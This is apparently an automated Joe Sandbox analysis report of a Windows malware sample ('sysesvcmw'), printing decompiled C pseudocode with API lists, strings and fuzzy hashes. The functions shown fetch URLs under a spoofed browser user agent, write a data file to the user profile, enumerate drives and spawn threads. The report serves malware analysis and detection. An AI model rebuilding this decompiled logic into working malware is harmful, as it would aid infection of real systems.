                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Sleeprecvfrom
                                                                                                                                                                                                                                                                                    • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                                                                                                                                                                                                                                    • API String ID: 668330359-3973262388
                                                                                                                                                                                                                                                                                    • Opcode ID: d874aecdcf10d4b5be9618b38b24f3ae2d323a3f92cb0c3b0d60b3f526243bf0
                                                                                                                                                                                                                                                                                    • Instruction ID: 8bedf7fd65d1d668ead3ec736ca13f9a22eb8deece20412d9194f72f96c2fcee
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d874aecdcf10d4b5be9618b38b24f3ae2d323a3f92cb0c3b0d60b3f526243bf0
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 062142B494022CEBDB20CB64DC85BE97774AB04708F1086E9E709B72C0D7B95AC68F5C
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 411 40d440-40d464 InternetOpenA 412 40d466-40d483 InternetOpenUrlA 411->412 413 40d4d8-40d4e9 Sleep 411->413 414 40d485-40d4ac HttpQueryInfoA 412->414 415 40d4ce-40d4d2 InternetCloseHandle 412->415 416 40d4c4-40d4c8 InternetCloseHandle 414->416 417 40d4ae-40d4b6 414->417 415->413 416->415 417->416 418 40d4b8-40d4c0 417->418 418->416
                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E0040D440(char* _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                                                    				char _v9;
                                                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                                                    				void _v20;
                                                                                                                                                                                                                                                                                    				long _v24;
                                                                                                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                                                                                                    				void* _t24;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v9 = 0;
                                                                                                                                                                                                                                                                                    				_t21 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36", 1, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                                    				_v16 = _t21;
                                                                                                                                                                                                                                                                                    				if(_v16 != 0) {
                                                                                                                                                                                                                                                                                    					_t24 = InternetOpenUrlA(_v16, _a4, 0, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                                    					_v8 = _t24;
                                                                                                                                                                                                                                                                                    					if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    						_v24 = 4;
                                                                                                                                                                                                                                                                                    						HttpQueryInfoA(_v8, 0x20000005,  &_v20,  &_v24, 0);
                                                                                                                                                                                                                                                                                    						if(_v20 > 0x1388 && _v20 !=  *_a8) {
                                                                                                                                                                                                                                                                                    							 *_a8 = _v20;
                                                                                                                                                                                                                                                                                    							_v9 = 1;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						InternetCloseHandle(_v8); // executed
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					InternetCloseHandle(_v16);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				Sleep(0x3e8); // executed
                                                                                                                                                                                                                                                                                    				return _v9;
                                                                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                                                                    0x0040d446
                                                                                                                                                                                                                                                                                    0x0040d457
                                                                                                                                                                                                                                                                                    0x0040d45d
                                                                                                                                                                                                                                                                                    0x0040d464
                                                                                                                                                                                                                                                                                    0x0040d476
                                                                                                                                                                                                                                                                                    0x0040d47c
                                                                                                                                                                                                                                                                                    0x0040d483
                                                                                                                                                                                                                                                                                    0x0040d485
                                                                                                                                                                                                                                                                                    0x0040d49f
                                                                                                                                                                                                                                                                                    0x0040d4ac
                                                                                                                                                                                                                                                                                    0x0040d4be
                                                                                                                                                                                                                                                                                    0x0040d4c0
                                                                                                                                                                                                                                                                                    0x0040d4c0
                                                                                                                                                                                                                                                                                    0x0040d4c8
                                                                                                                                                                                                                                                                                    0x0040d4c8
                                                                                                                                                                                                                                                                                    0x0040d4d2
                                                                                                                                                                                                                                                                                    0x0040d4d2
                                                                                                                                                                                                                                                                                    0x0040d4dd
                                                                                                                                                                                                                                                                                    0x0040d4e9

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040D457
                                                                                                                                                                                                                                                                                    • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040D476
                                                                                                                                                                                                                                                                                    • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040D49F
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040D4C8
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040D4D2
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040D4DD
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36, xrefs: 0040D452
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                                                                                                                                                                                                                                    • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    • API String ID: 2743515581-858318475
                                                                                                                                                                                                                                                                                    • Opcode ID: bf6bfaf4f45310fce9545a939de9a762d1e78cec5d6cbb91b294f9239cf924bb
                                                                                                                                                                                                                                                                                    • Instruction ID: 741b2aa36f5f9633f3a5325d1023e1587c91f2e0dd76465297faea143a49f62d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bf6bfaf4f45310fce9545a939de9a762d1e78cec5d6cbb91b294f9239cf924bb
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9821F974E40208FBDB10DF94CC49FEEB775AB48705F1085A5FA15AB2C0C7B96A44CB65
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00409660(void* __eax) {
                                                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                                                    				long _v12;
                                                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                                                                                    				long _v24;
                                                                                                                                                                                                                                                                                    				signed int _t36;
                                                                                                                                                                                                                                                                                    				void* _t38;
                                                                                                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                                                                                                    				signed int _t65;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				if( *0x416e2c == 0) {
                                                                                                                                                                                                                                                                                    					return __eax;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t36 =  *0x416e2c; // 0x200
                                                                                                                                                                                                                                                                                    				_v12 = _t36 << 3;
                                                                                                                                                                                                                                                                                    				_t38 = E00408B20(_v12); // executed
                                                                                                                                                                                                                                                                                    				_v8 = _t38;
                                                                                                                                                                                                                                                                                    				__eflags = _v8;
                                                                                                                                                                                                                                                                                    				if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    					_v20 = 0;
                                                                                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                                                                                    						__eflags = _v20 -  *0x416e2c; // 0x200
                                                                                                                                                                                                                                                                                    						if(__eflags >= 0) {
                                                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_v8 + _v20 * 8)) =  *((intOrPtr*)( *((intOrPtr*)(0x416e30 + _v20 * 4)) + 4));
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_v8 + 4 + _v20 * 8)) =  *((intOrPtr*)( *((intOrPtr*)(0x416e30 + _v20 * 4)) + 8));
                                                                                                                                                                                                                                                                                    						_t65 = _v20 + 1;
                                                                                                                                                                                                                                                                                    						__eflags = _t65;
                                                                                                                                                                                                                                                                                    						_v20 = _t65;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t40 = CreateFileW("C:\Users\Albus\tbnds.dat", 0x40000000, 0, 0, 2, 2, 0); // executed
                                                                                                                                                                                                                                                                                    					_v16 = _t40;
                                                                                                                                                                                                                                                                                    					__eflags = _v16 - 0xffffffff;
                                                                                                                                                                                                                                                                                    					if(_v16 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    						WriteFile(_v16, _v8, _v12,  &_v24, 0); // executed
                                                                                                                                                                                                                                                                                    						FlushFileBuffers(_v16);
                                                                                                                                                                                                                                                                                    						CloseHandle(_v16);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					InterlockedExchange(0x4143b4, 0x3d);
                                                                                                                                                                                                                                                                                    					return E00408C70(_v8);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t38;
                                                                                                                                                                                                                                                                                    			}












                                                                                                                                                                                                                                                                                    0x0040966d
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409674
                                                                                                                                                                                                                                                                                    0x0040967c
                                                                                                                                                                                                                                                                                    0x00409683
                                                                                                                                                                                                                                                                                    0x0040968b
                                                                                                                                                                                                                                                                                    0x0040968e
                                                                                                                                                                                                                                                                                    0x00409692
                                                                                                                                                                                                                                                                                    0x00409698
                                                                                                                                                                                                                                                                                    0x004096aa
                                                                                                                                                                                                                                                                                    0x004096ad
                                                                                                                                                                                                                                                                                    0x004096b3
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004096c8
                                                                                                                                                                                                                                                                                    0x004096de
                                                                                                                                                                                                                                                                                    0x004096a4
                                                                                                                                                                                                                                                                                    0x004096a4
                                                                                                                                                                                                                                                                                    0x004096a7
                                                                                                                                                                                                                                                                                    0x004096a7
                                                                                                                                                                                                                                                                                    0x004096f8
                                                                                                                                                                                                                                                                                    0x004096fe
                                                                                                                                                                                                                                                                                    0x00409701
                                                                                                                                                                                                                                                                                    0x00409705
                                                                                                                                                                                                                                                                                    0x00409719
                                                                                                                                                                                                                                                                                    0x00409723
                                                                                                                                                                                                                                                                                    0x0040972d
                                                                                                                                                                                                                                                                                    0x0040972d
                                                                                                                                                                                                                                                                                    0x0040973a
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409749
                                                                                                                                                                                                                                                                                    0x0040974f

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(C:\Users\user\tbnds.dat,40000000,00000000,00000000,00000002,00000002,00000000), ref: 004096F8
                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 00409719
                                                                                                                                                                                                                                                                                    • FlushFileBuffers.KERNEL32 ref: 00409723
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040972D
                                                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(004143B4,0000003D), ref: 0040973A
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • C:\Users\user\tbnds.dat, xrefs: 004096F3
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                                                                                                                                                                                                                                    • String ID: C:\Users\user\tbnds.dat
                                                                                                                                                                                                                                                                                    • API String ID: 442028454-140903278
                                                                                                                                                                                                                                                                                    • Opcode ID: 69e3a4351929d0e0f14d0b52311952ce385dfcb3d011d1b1f3d42ed8ab782109
                                                                                                                                                                                                                                                                                    • Instruction ID: 09bb8ad8a153661e876b0a8aa7cfca9b830c2f60f8f6b2a0515d583d03b87c58
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 69e3a4351929d0e0f14d0b52311952ce385dfcb3d011d1b1f3d42ed8ab782109
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 11314CB8A00208EFCB14DF94D845F9EB7B1BB48300F20C669E515A7391C775AE51CF59
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00404CB0() {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                                                                    				long _v20;
                                                                                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                                                                                    				void* _v28;
                                                                                                                                                                                                                                                                                    				char _v32;
                                                                                                                                                                                                                                                                                    				int _v36;
                                                                                                                                                                                                                                                                                    				long _t31;
                                                                                                                                                                                                                                                                                    				long _t35;
                                                                                                                                                                                                                                                                                    				void* _t44;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v20 = GetLogicalDrives();
                                                                                                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                                                                                                    				_v12 = 0x80000002;
                                                                                                                                                                                                                                                                                    				_v8 = 0x80000001;
                                                                                                                                                                                                                                                                                    				_v24 = 0;
                                                                                                                                                                                                                                                                                    				while(_v24 < 2) {
                                                                                                                                                                                                                                                                                    					_t31 = RegOpenKeyExW( *(_t44 + _v24 * 4 - 8), L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", 0, 0x20019,  &_v28); // executed
                                                                                                                                                                                                                                                                                    					if(_t31 == 0) {
                                                                                                                                                                                                                                                                                    						_v32 = 0;
                                                                                                                                                                                                                                                                                    						_v36 = 4;
                                                                                                                                                                                                                                                                                    						_t35 = RegQueryValueExW(_v28, L"NoDrives", 0, 0,  &_v32,  &_v36); // executed
                                                                                                                                                                                                                                                                                    						if(_t35 == 0 && _v32 != 0) {
                                                                                                                                                                                                                                                                                    							_v16 = _v16 | _v32;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						RegCloseKey(_v28);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_v24 = _v24 + 1;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return  !_v16 & _v20;
                                                                                                                                                                                                                                                                                    			}














                                                                                                                                                                                                                                                                                    0x00404cbc
                                                                                                                                                                                                                                                                                    0x00404cbf
                                                                                                                                                                                                                                                                                    0x00404cc6
                                                                                                                                                                                                                                                                                    0x00404ccd
                                                                                                                                                                                                                                                                                    0x00404cd4
                                                                                                                                                                                                                                                                                    0x00404ce6
                                                                                                                                                                                                                                                                                    0x00404d04
                                                                                                                                                                                                                                                                                    0x00404d0c
                                                                                                                                                                                                                                                                                    0x00404d0e
                                                                                                                                                                                                                                                                                    0x00404d15
                                                                                                                                                                                                                                                                                    0x00404d31
                                                                                                                                                                                                                                                                                    0x00404d39
                                                                                                                                                                                                                                                                                    0x00404d47
                                                                                                                                                                                                                                                                                    0x00404d47
                                                                                                                                                                                                                                                                                    0x00404d4e
                                                                                                                                                                                                                                                                                    0x00404d4e
                                                                                                                                                                                                                                                                                    0x00404ce3
                                                                                                                                                                                                                                                                                    0x00404ce3
                                                                                                                                                                                                                                                                                    0x00404d61

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetLogicalDrives.KERNEL32 ref: 00404CB6
                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.KERNEL32 ref: 00404D04
                                                                                                                                                                                                                                                                                    • RegQueryValueExW.KERNEL32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00404D31
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00404D4E
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • NoDrives, xrefs: 00404D28
                                                                                                                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00404CF7
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseDrivesLogicalOpenQueryValue
                                                                                                                                                                                                                                                                                    • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                                                                                                                                                                                                                                    • API String ID: 2666887985-3471754645
                                                                                                                                                                                                                                                                                    • Opcode ID: 9d90b313020425024ef4211a7d2766a6eb2190f61c39788aa0d4f477df4a16fe
                                                                                                                                                                                                                                                                                    • Instruction ID: 1183846ab50913c5dc9fb8b6007841b1b3d3e2f8f7d5b2678c7a8c905f18143c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d90b313020425024ef4211a7d2766a6eb2190f61c39788aa0d4f477df4a16fe
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E110DB0E4020A9BDF10CFD0D945BEEBB74FB48704F108019E611B7280D7B89645CF99
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E0040BBA0(signed int* _a4, long _a8, _Unknown_base(*)()* _a12, void* _a16, DWORD* _a20, HANDLE* _a24) {
                                                                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                                                                    				signed int* _v12;
                                                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                                                    				void* _t45;
                                                                                                                                                                                                                                                                                    				void* _t49;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                                                    				if(_a4 == 0) {
                                                                                                                                                                                                                                                                                    					L8:
                                                                                                                                                                                                                                                                                    					return _v8;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_v12 = _a4;
                                                                                                                                                                                                                                                                                    				EnterCriticalSection( &(_v12[1]));
                                                                                                                                                                                                                                                                                    				E0040BB20( &(_v12[1]), _v12);
                                                                                                                                                                                                                                                                                    				if(_a12 != 0) {
                                                                                                                                                                                                                                                                                    					_v12[7] = E00408B60(_v12[7], 4 +  *_v12 * 4, _v12[7], 4 +  *_v12 * 4);
                                                                                                                                                                                                                                                                                    					if(_v12[7] != 0) {
                                                                                                                                                                                                                                                                                    						_t45 = CreateThread(0, _a8, _a12, _a16, 0, _a20); // executed
                                                                                                                                                                                                                                                                                    						_v16 = _t45;
                                                                                                                                                                                                                                                                                    						if(_v16 != 0) {
                                                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_v12[7] +  *_v12 * 4)) = _v16;
                                                                                                                                                                                                                                                                                    							 *_v12 =  *_v12 + 1;
                                                                                                                                                                                                                                                                                    							if(_a24 != 0) {
                                                                                                                                                                                                                                                                                    								_t49 = GetCurrentProcess();
                                                                                                                                                                                                                                                                                    								DuplicateHandle(GetCurrentProcess(), _v16, _t49, _a24, 0, 0, 2);
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							_v8 = 1;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				LeaveCriticalSection( &(_v12[1]));
                                                                                                                                                                                                                                                                                    				goto L8;
                                                                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                                                                    0x0040bba6
                                                                                                                                                                                                                                                                                    0x0040bbb1
                                                                                                                                                                                                                                                                                    0x0040bc88
                                                                                                                                                                                                                                                                                    0x0040bc8e
                                                                                                                                                                                                                                                                                    0x0040bc8e
                                                                                                                                                                                                                                                                                    0x0040bbba
                                                                                                                                                                                                                                                                                    0x0040bbc4
                                                                                                                                                                                                                                                                                    0x0040bbce
                                                                                                                                                                                                                                                                                    0x0040bbda
                                                                                                                                                                                                                                                                                    0x0040bbff
                                                                                                                                                                                                                                                                                    0x0040bc09
                                                                                                                                                                                                                                                                                    0x0040bc1f
                                                                                                                                                                                                                                                                                    0x0040bc25
                                                                                                                                                                                                                                                                                    0x0040bc2c
                                                                                                                                                                                                                                                                                    0x0040bc3c
                                                                                                                                                                                                                                                                                    0x0040bc4a
                                                                                                                                                                                                                                                                                    0x0040bc50
                                                                                                                                                                                                                                                                                    0x0040bc5c
                                                                                                                                                                                                                                                                                    0x0040bc6e
                                                                                                                                                                                                                                                                                    0x0040bc6e
                                                                                                                                                                                                                                                                                    0x0040bc74
                                                                                                                                                                                                                                                                                    0x0040bc74
                                                                                                                                                                                                                                                                                    0x0040bc2c
                                                                                                                                                                                                                                                                                    0x0040bc09
                                                                                                                                                                                                                                                                                    0x0040bc82
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040BBC4
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040BB20: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040BB60
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040BB20: CloseHandle.KERNEL32(?), ref: 0040BB79
                                                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040BC1F
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040BC5C
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040BC67
                                                                                                                                                                                                                                                                                    • DuplicateHandle.KERNEL32 ref: 0040BC6E
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040BC82
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2251373460-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 33c17659471092c2b756b62356fc1a2425cda27d656a6ab2967af513715b6e0f
                                                                                                                                                                                                                                                                                    • Instruction ID: 02f9ad1cbe3c42a1849ee7ac27792547e5d144dd11b2029950602c6e4363e771
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33c17659471092c2b756b62356fc1a2425cda27d656a6ab2967af513715b6e0f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E311074900208EFDB04DF94D899F9E7BB5FF48304F108159E905A7391D775AA91CF98
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                                                                                                                                                    			E00405CF0() {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                                                                                    				intOrPtr _v40;
